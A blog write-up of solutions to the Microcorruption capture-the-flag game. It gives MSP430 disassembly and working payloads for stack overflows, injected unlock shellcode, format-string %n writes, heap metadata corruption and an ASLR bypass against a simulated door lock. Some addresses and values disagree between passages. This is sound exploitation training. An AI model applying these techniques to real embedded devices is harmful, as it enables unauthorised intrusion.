Solving Microcorruption

February 20, 2024

My growing interest towards low-level programming led me to a CTF game called Microcorruption. The goal there is to do a series of challenges related to hacking embedded systems. There is some dissasembly of a digital lock firmware that you should analyze and exploit to find a way for opening the door. Each level progressively increases in complexity. I feel that the difficulty progression was great and in general it’s a good tool to learn basic binary exploitation vulnerabilities.

Most of the vulernabilities explored there are related to stack overflows, format string attacks, heap overflows. If you consider modern OS, most of these are considered outdated and are not as common as they used to be. However, if we embark in a world of embedded systems, these are still very relevant. In this post, I will provide my solutions and notes for different levels of Microcorruption.

Prerequisites

Before starting Microcorruption, I would recommend to have some basic knowledge of assembly language and binary exploitation. If you want to get a good ghasp on assemby, there is a great book called “RE for beginners” by Dennis Yurichev. If you want to understand how binary exploitation works, I highly recommend reading “Hacking - The Art of Exploitation” by Jon Erickson.

Importnant notes

Hanoi

This level is mostly about stepping through the code. The input password prompt mentions that the password should be between 8 to 16 characters in length. After quickly observing the code, I noticed that there are two interesting functions: test_password_valid and login.

4454 <test_password_valid>
4454:  0412           push	r4
4456:  0441           mov	sp, r4
4458:  2453           incd	r4
445a:  2183           decd	sp
445c:  c443 fcff      mov.b	#0x0, -0x4(r4)
4460:  3e40 fcff      mov	#0xfffc, r14
4464:  0e54           add	r4, r14
4466:  0e12           push	r14
4468:  0f12           push	r15
446a:  3012 7d00      push	#0x7d
446e:  b012 7a45      call	#0x457a <INT>
4472:  5f44 fcff      mov.b	-0x4(r4), r15
4476:  8f11           sxt	r15
4478:  3152           add	#0x8, sp
447a:  3441           pop	r4
447c:  3041           ret

4520 <login>
4520:  c243 1024      mov.b	#0x0, &0x2410
4524:  3f40 7e44      mov	#0x447e "Enter the password to continue.", r15
4528:  b012 de45      call	#0x45de <puts>
452c:  3f40 9e44      mov	#0x449e "Remember: passwords are between 8 and 16 characters.", r15
4530:  b012 de45      call	#0x45de <puts>
4534:  3e40 1c00      mov	#0x1c, r14
4538:  3f40 0024      mov	#0x2400, r15
453c:  b012 ce45      call	#0x45ce <getsn>
4540:  3f40 0024      mov	#0x2400, r15
4544:  b012 5444      call	#0x4454 <test_password_valid>
4548:  0f93           tst	r15
454a:  0324           jz	$+0x8 <login+0x32>
454c:  f240 4d00 1024 mov.b	#0x4d, &0x2410
4552:  3f40 d344      mov	#0x44d3 "Testing if password is valid.", r15
4556:  b012 de45      call	#0x45de <puts>
455a:  f290 6500 1024 cmp.b	#0x65, &0x2410
4560:  0720           jnz	$+0x10 <login+0x50>
4562:  3f40 f144      mov	#0x44f1 "Access granted.", r15
4566:  b012 de45      call	#0x45de <puts>
456a:  b012 4844      call	#0x4448 <unlock_door>
456e:  3041           ret
4570:  3f40 0145      mov	#0x4501 "That password is not correct.", r15
4574:  b012 de45      call	#0x45de <puts>
4578:  3041           ret

After stepping through test_password_valid, it was not obvious what it does. So, let’s proceed level by level first, and see if login has any low hanging fruits. If we step through login, we will notice, that after we have entered a test valid password, we will continue till cmp.b #0x42, &0x2410, and after that immediately there is an access granted jump gate! If we examine address &0x2410 in the memory dump, it will become clear that upper address stores our password:

2400: 4d59 5041 5353 574f 5244 0000 0000 0000   MYPASSWORD......
2410: 0000 0000 0000 0000 0000 0000 0000 0000   ................

So, let’s just try to overflow the input buffer with 17 characters. Then, our 17th byte will be stored exactly at address 0x2410. When adding correct ASCII code character to the password of length 17, the lock opens.

Cusco

Here, the code seems to be working flawlessly. However, we can notice that entered password is stored directly on the stack. If we recall that function return address is stored on the stack as well, we may want to try to overwrite it with some value that will change the control flow of the program so that our main function will actually return to some other address than originally intended.

If we will place breakpoint at the ret instruction in the main function and experiment with password length, we can observe that setting password to 17 characters overwrites location where sp points at. And, as we know, when function returns, the CPU gets the return address from the top of the stack. That’s where sp points at! So, if we will take last 4 bytes of our 17-char password and modify them to be any address of our program, the ret instruction will jump there. So, we can just look at the address of call #0x4446 <unlock_door> and solve this challenge. Just do not forget to reverse the byte order in your payload since the processor architecture is little endian.

Reykjavik

Something wired is happening here. If we will go through the code listing, we won’t find any usual password prompting code. However, there is a mysterious enc function that does something interesting. xor is involved, so this is likely some encoding function. If we will step through the code, we will jump to some memory location after calling enc. We see that there is this call #0x2400 instruction after our enc call. To understand what happens next, we have to switch our mindset a bit. In assembly, code is data and data is code. We have just jumped to some arbitrary memory location outside of our usual code segment. But for processor, it does not matter from where to execute the instructions. So, we know where this encoded function starts, but how to find where it ends so that we can study it. Since this is a function, we can just look up an opcode for ret, which is 3041. We can copy all bytes of this function and go to the Disassembler screen. Let’s paste them there and hit the disassemble button. Eurika! We get the function code. Let’s understand what it does:

; prepare stack frame
0b12           push	r11
0412           push	r4
0441           mov	sp, r4
; local variables
2452           add	#0x4, r4
3150 e0ff      add	#0xffe0, sp
3b40 2045      mov	#0x4520, r11 ; interesting, what's here? it's the address of "what's the password?" string
073c           jmp	$+0x10
1b53           inc	r11
8f11           sxt	r15
0f12           push	r15
0312           push	#0x0
b012 6424      call	#0x2464 ; this is likely a call for puts
2152           add	#0x4, sp
6f4b           mov.b	@r11, r15
4f93           tst.b	r15
f623           jnz	$-0x12
3012 0a00      push	#0xa
0312           push	#0x0
b012 6424      call	#0x2464 ; this is some another mysterious address, let's check it out. The code is below. Its an interrupt call
2152           add	#0x4, sp
3012 1f00      push	#0x1f
3f40 dcff      mov	#0xffdc, r15
0f54           add	r4, r15
0f12           push	r15
2312           push	#0x2
b012 6424      call	#0x2464 ; calling this guy again
3150 0600      add	#0x6, sp
b490 83ad dcff cmp	#0xad83, -0x24(r4)
0520           jnz	$+0xc
3012 7f00      push	#0x7f
b012 6424      call	#0x2464 ; and again! UNLOCK call here
2153           incd	sp
3150 2000      add	#0x20, sp
3441           pop	r4
3b41           pop	r11
3041           ret

; 0x2464 function - this looks exacly as our INT function from earlier, so we are calling an interrupt here!
1e41 0200      mov	0x2(sp), r14
0212           push	sr
0f4e           mov	r14, r15
8f10           swpb	r15
024f           mov	r15, sr
32d0 0080      bis	#0x8000, sr
b012 1000      call	#0x10
3241           pop	sr
3041           ret

From previous challenge we know, that this interrupt sequence unlocks the door

4446:  3012 7f00      push	#0x7f
444a:  b012 4245      call	#0x4542 <INT>

We have this interrupt callout in our encoded function. From the looks of it, the code is exactly the same as it was previously, but it’s not stored in the code segment of the binary now. So, my guess is that the previous overflow bug should still work, but the return address will now be different. Let’s find the correct return address and try to overflow the stack yet again. The opcode for our unlock interrupt is b012 6424. Now, let’s locate it in the memory dump and record the address. It is 0x2458.

After checking the stack overflow path it became clear that we can’t overflow the stack this time to the point that we will overwrite the return address of this encoded function. Let’s look at the function source again:

b490 83ad dcff cmp	#0xad83, -0x24(r4)
0520           jnz	$+0xc
3012 7f00      push	#0x7f
b012 6424      call	#0x2464 ; and again! UNLOCK call here

Probably, this cmp is the key. If we will try try out entering password 83ad in hex to account for little endianness we will unlock the door!

Whitehorse

There’s a quick find in the spirit of previous challenges that we can utilize right away. Overflow prompt that allows us to jump to any address on main return:

1234567890AAAAAAAAAAAAAAAAAAAAAABBBB

I was wondering what to do after I’ve fond an overflow for quite a while. There is no clear place in the code that we can jump to to get around security. As it turns out, the key to this challenge is to read the manual. After inspecting the manual that you can find on the microcorruption site, we shall see that there is an interrupt 0x7f that can unlock the door. Since we have an overflow payload now, we can embed assembly to execute the 0x7F interrupt in there using disassembler tool provided on the site. We can create this bytecode:

3012 7f00      push	#0x7f
b012 3245      call	#0x4532 <INT>

Now, we need to capture the return address to be some part of our prompt where we will inject the bytecode for interrupt call. The address where our prompt will start is at 0x3bf4

3be0: 0000 4645 0100 4645 0300 ba45 0000 0a00   ..FE..FE...E....
3bf0: 0000 2a45 1234 5678 90aa aaaa aaaa aaaa   ..*E.4Vx........
3c00: aaaa aaaa 5844 aaaa aaaa aaaa aaaa aaaa   ....XD..........
3c10: aaaa aaaa aa00 0000 0000 0000 0000 0000   ................
3c20: 0000 0000 0000 0000 0000 0000 0000 0000   ................

Let’s create our payload. We can just insert instructions at the start of the prompt and put the return address in little endian format to where sp is pointing at. The payload will look like this:

30127f00b0123245AAAAAAAAAAAAAAAAf43b

Here is a dissection of this payload:

    ┌──────────────────────────────────────────────┐
    │                                              │
    │                                              │
    │ ┌────────────────────────────────────────┐   │
    │ │                                        │   │
    ▼ ▼                                        │   │
  0x3b34: 3012 7f00 b012 3245 AAAAAAAAAAAAAAAA f4 3b
          ───────── ───────── ──────────────── ── ──
          push      call      padding          stack
          0x7f      <INT>                      pointer

Montevideo

This time, the input string is copied from one portion of the memory to another. The issue is that we still can overflow the stack to get to the return address. sp on login return points to 0x43f0, and with long enough prompt we can still set it:

43f0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa [aaaa] <- sp points here   ................
4400: aaaa aaaa aaaa aaaa aaaa aaaa 005a  3f40                     .............Z?@

So, let’s try out our unlock interrupt payload:

30127f00b0123245AAAAAAAAAAAAAAAAAAf043

When we do this, we observe that the whole string is not being copied to the destination memory. What’s wrong there?

4514:  3e40 0024      mov	#0x2400, r14
4518:  0f41           mov	sp, r15
451a:  b012 dc45      call	#0x45dc <strcpy> <- HERE!
451e:  3d40 6400      mov	#0x64, r13
4522:  0e43           clr	r14
4524:  3f40 0024      mov	#0x2400, r15
4528:  b012 f045      call	#0x45f0 <memset>

The problem is that our payload includes the 00 byte which strcpy interprets as the end of the string, so it stops there. To get around this, we can modify our payload to hide the 00 byte. Thankfully, the only 00 that we have is in our interrupt code: 7f00. So, we can just hide it by using some maths, like 7f11-0011 = 7f00. No null byte in the code 🏴‍☠️. Let’s modify our payload. We will use r15 as a temporary register for computing the interrupt code

mov #0x7f11,r15
add #-0x11,r15
push r15
call	#0x454c

The above code assembles into

3f40117f3f50efff0f12b0124c45AAAAee43

After trying this I had some troubles due to sr redister which turns off the CPU before the interrupt gets called. So, why mess with assembly payload at all, when we can just overwrite the first argument of INT to be 0x7f by putting it on the stack? It reads the interrupt code from the stack right at the start of the function anyways. Let’s try this payload:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa4c45bbbb7f00

And yes, this is indeed a much simpler solution. The door unlocks.

Johannesburg

Observation: we can overwrite first few functions using prompt, stack still overflows. There is a password length check that avoids calling ret in an attempt to prevent the stack overflow.

4578:  f190 4600 1100 cmp.b	#0x46, 0x11(sp)
457e:  0624           jz	$+0xe <login+0x60>
4580:  3f40 ff44      mov	#0x44ff "Invalid Password Length: password too long.", r15
4584:  b012 f845      call	#0x45f8 <puts>
4588:  3040 3c44      br	#0x443c <__stop_progExec__> ; if the password is too long, we wont reach ret

The password length check just checks one byte at some memory location:

cmp.b	#0x46, 0x11(sp)

We can easily set this byte to 0x46 and bypass the check:

424242424242424242424242424242424246

Done 💀. Now we can overflow the return address. Let’s use our 0x7f payload from before. The INT address is 0x4594 this time:

424242424242424242424242424242424246944543437f00

The lock opens!

Santa Cruz

Wow, lot’s of code. Asks us to ender password and username. Obesrvation: there is a length checking loop.

45d0:  0f4b           mov	r11, r15
45d2:  0e44           mov	r4, r14
45d4:  3e50 e8ff      add	#0xffe8, r14 o ; -24
45d8:  1e53           inc	r14 ; we are incrementing counter
45da:  ce93 0000      tst.b	0x0(r14) ; and testing if we've met a null byte here
45de:  fc23           jnz	$-0x6 <login+0x88>
45e0:  0b4e           mov	r14, r11
45e2:  0b8f           sub	r15, r11
45e4:  5f44 e8ff      mov.b	-0x18(r4), r15; -0x18(r4) stores 16 (dec)
45e8:  8f11           sxt	r15
45ea:  0b9f           cmp	r15, r11 ; comparing length here
45e4:  5f44 e8ff      mov.b	-0x18(r4), r15

This is local var for minimum password length located at abs address 0x43b4. There is similar check that checks previous byte for minimum length:

45fa:  5f44 e7ff      mov.b	-0x19(r4), r15

We can craft a username payload to overwrite this

414141414141414141414141414141414108101041414141414141414141414141414141414141413a46
414141414141414141414141414141414108101042424242424242424242424242424242424242423a46
4141414141414141414141414141414141081010

The return address of SP in login function is at 0x43c0.

There are two instructions that make some comparison at the end of the function

464c:  c493 faff      tst.b	-0x6(r4)
4650:  0624           jz	$+0xe <login+0x10e>

We place this 00 in memory right at the start of the function

455c:  c443 faff      mov.b	#0x0, -0x6(r4)

We need this test to pass. Adding zeroes before our address won’t work due to strcpy. There is one new door that has opened for us. Since we now control length checks, we can overflow the password too! We can choose the password length that we need, then set 00 at the correct address to bypass the last check. After a lot of trial and error, I came with the correct username and password:

4141414141414141414141414141414141084040424242424242424242424242424242424242424242423a46
4343434343434343434343434343434343

Jakarta

When we enter password, getsn call writes it to the same memory location as our previous username.

There might be a bug in terms of how we compute the username length:

4596:  1f53           inc	r15
4598:  cf93 0000      tst.b	0x0(r15)
459c:  fc23           jnz	$-0x6 <login+0x36>
459e:  0b4f           mov	r15, r11 ; r11 now contains address of the end of the string
45a0:  3b80 0224      sub	#0x2402, r11 ; r11 now contains the length of the string
45a4:  3e40 0224      mov	#0x2402, r14 ; r14 now contains the start of the string
45a8:  0f41           mov	sp, r15
45aa:  b012 f446      call	#0x46f4 <strcpy> ; here, we copy all of it to memory. The limit is 512 bytes according to first getsn limit
45ae:  7b90 2100      cmp.b	#0x21, r11 ; check the length of the string against 33
45b2:  0628           jnc	$+0xe <login+0x60>

Here, we do sub to compute the actual length, and r15 contains our location of the 00 byte in the username. We can easily trick the check by including 00 byte at the start of the username, but then strcpy will skip copying the whole string. The second getsn call copies max 32 chars into memory, but what about subsequent strcpy call? It will copy everything up to 00 byte again, which will be a part of our password string no matter what.

;r11 contains username length
45c8:  3e40 1f00      mov	#0x1f, r14
45cc:  0e8b           sub	r11, r14
; now, r14 contains 31 - r11 = remaining chars up to 32 symbols of username + password

; keeps the last 9 bits of the value and zeroes the rest of them
and	#0x1ff, r14 
; address where to copy the password
mov	#0x2402, r15
; get the password
call	#0x46b8 <getsn>

After lots of trials an errors and finally giving up and browsing the internet I’ve found that there is a mistake here:

45c8:  3e40 1f00      mov	#0x1f, r14
45cc:  0e8b           sub	r11, r14 ; 31 dec - your username length.
45ce:  3ef0 ff01      and	#0x1ff, r14
45d2:  3f40 0224      mov	#0x2402, r15
45d6:  b012 b846      call	#0x46b8 <getsn>

0x1f is 31 in decimal, but we can enter a password longer than that. And this will cause an overflow in r14. Since this controls how many chars we will get for a password afterwards, we can try to overflow the password field now! Let’s try a username of length 32, and some really long password:

4242424242424242424242424242424242424242424242424242424242424242

Yes, we can now trick strcpy into copying all of this beauty onto the stack! But what about the length checks?

45fa:  3f80 0224      sub	#0x2402, r15
45fe:  0f5b           add	r11, r15
4600:  7f90 2100      cmp.b	#0x21, r15 ; compare that lower bytes are less than 0x21
4604:  0628           jnc	$+0xe <login+0xb2>

This check compares only lower bytes, not upper bytes. So… what about password of length 0x0100? Then, we will add to r11, which will be 0x20, and our check should pass. If we will examine the return address, we will find out that our sp is at 0x4 offset from our password string. And the unlock interrupt address is at 461c. Now, it’s down to some simple math to overflow the return address.

Let’s whisper our incantations now, and unlock the door:

# username
python -c 'print("42"*32)' | pbcopy  

# password
python -c 'print("424242421c46" + "42" * (0x100 - 0x6))' | pbcopy 

Addis Ababa

Since printf is used here, it’s possibly vulernable to https://owasp.org/www-community/attacks/Format_string_attack.

Useful readup on why they work: https://web.ecs.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

4476:  814f 0000      mov	r15, 0x0(sp)
447a:  0b12           push	r11
447c:  b012 c845      call	#0x45c8 <printf>

Looks like format string is not being used here! It’s interesting how we test for unlock here:

4472:  b012 b044      call	#0x44b0 <test_password_valid>
4476:  814f 0000      mov	r15, 0x0(sp)
...
448a:  8193 0000      tst	0x0(sp)
448e:  0324           jz	$+0x8 <main+0x5e>
4490:  b012 da44      call	#0x44da <unlock_door>

So, if we could put 0 at the top of the stack, we will trigger the unlock. We copy only first 19 characters:

4454:  3e40 1300      mov	#0x13, r14 ; 0x13 == 19
4458:  3f40 0024      mov	#0x2400, r15
445c:  b012 8c45      call	#0x458c <getsn>

The %n format specifier can be used to write to memory. It writes the number of characters successfully written so far to the integer pointed to by its corresponding argument. If an attacker can control the format string, they can use %n to write arbitrary values to arbitrary locations.

n The argumentis is of type unsigned int*. Saves the number of characters printed thus far. No output is produced.

Indeed, if we use something like this, we will crash the program

aaaa%n%n:aaaa%n%n%n

I noticed that the program jumps to address 6161, which is aa in char. If I will take the call address of unlock 0x4490 and add it to the first letters of our password

python -c 'print("9044" + "".join(format(ord(c), "02x") for c in "a%n%n:bbb"))' 

However, now address 0x4490 got overwritten with something Ok, looks like we can overwrite memory at the location of the first two chars with the total number of chars written. This can be used to modify some instruction to bypass the correctness check.

447c:  b012 c845      call	#0x45c8 <printf>
4480:  2153           incd	sp
4482:  3f40 0a00      mov	#0xa, r15
4486:  b012 5045      call	#0x4550 <putchar>
448a:  8193 0000      tst	0x0(sp) ; this checks the return value from test password function
448e:  0324           jz	$+0x8 <main+0x5e>
4490:  b012 da44      call	#0x44da <unlock_door>

Luckily, we can easily override the top of the stack with some non-zero number to bypass the tst and subsequent jz. Let’s locate the address of the top of the stack and create our payload:

python -c 'print("a630" + "".join(format(ord(c), "02x") for c in "a%n%n:bbb"))' 

Novosibirsk

There is clearly another printf vulernability here. And now we can copy up to 512 characters from the input Also, this time we are calling an interrupt that checks password validity internally

; conditional_unlock_door
...
44c2:  0e12           push	r14
44c4:  0f12           push	r15
44c6:  3012 7e00      push	#0x7e
44ca:  b012 3645      call	#0x4536 <INT>

However, since we can use a lot of chars, why not to try to override the interrupt number that we are executing?

44c6:  3012 7e00      push	#0x7e

Let’s change this to 0x7f to unconditionally open the door. It will amount to 127 in dec, so we can use %n vulernability again to modify the opcode of the push instruction and change the interrupt code We can use this code to generate the payload:

python -c 'print("c844" + "42"*125 + "".join(format(ord(c), "02x") for c in "%n%n"))' | pbcopy

Breakdown

Algiers

This challenge is a bit different. It’s related to heap corruption attachs, which are a new type for us.

Here are some good related materials:

The approach to tackle Algiers is that you should take advantage of overflowing the malloc buffer structure. You can enter long password and overwrite chunk’s metadata. If you will reverse what free does carefully, you will notice that the key is on this line:

452a:  8e4c 0400      mov	r12, 0x4(r14)

We are moving some data we have control of to some memory address that we have control of. Meaning, that if we put a correct number in r14, we can write to the top of the stack. In other words, we can overwrite the return address of the free function. By carefully examining which mathematical operations happen to registers inside free function we can calculate what value to put in there so that at the end of the function we will write address of an unlock call. The resulting payload is

4242424242424242424242424242424290434024dcff414141

Vladivostok

This challenge presents an ASLR. ASLR is a security feature that randomizes the memory address where system executables are loaded into memory. This makes it harder for attackers to predict the location of code in memory. This makes debugging and understanding what is happening in the code a lot harder. However, we can still notice that sp can be overflowed by providing long inputs. The question now is where should we return to?

414141414141414141414242
; where 4242 will be our SP address

So, we can find out to which address we should return to. This is complicated, since ASLR randomizes code segment address. However, if you read through the main the function itself, it will be clear that the code bytes are just copied over to some other random location in memory. That means, that all relative addresses should stay the same. We should just calculate an offset for something that calls an interrupt. And then we can use the door unlock interrupt address that we will put on stack.

If we will use %x%x%x%x as a username, we will see top of the stack printed. Since it’s a print, we can judge that this is the addreess of a printf call.

476a <printf> ; in the original code
; base address of the original code is 0x4400
; we can try returning to
48ec <_INT>

0x48ec -  0x476a = 0x19a

Now, at the start of the program we can print or printf address, calculate INT address using the offset. Our winning payload is

4141414141414141 [%x%x output + 0x19a] 4141 7f00

Conclusion

Microcorruption is a very challenging and fun way to learn about embedded systems security. It’s a great way to learn about assembly, stack overflows, memory corruption bugs and even some advanced concepts like ASLR.

While many types of these bugs are not very relevant in software world due to modern security features, they are still relevant and quite easy to make in the embedded world, where can find yourself writing code for bare metal without any OS support.

Share this post

Solving Microcorruption - February 20, 2024 - Kirill Dubovikov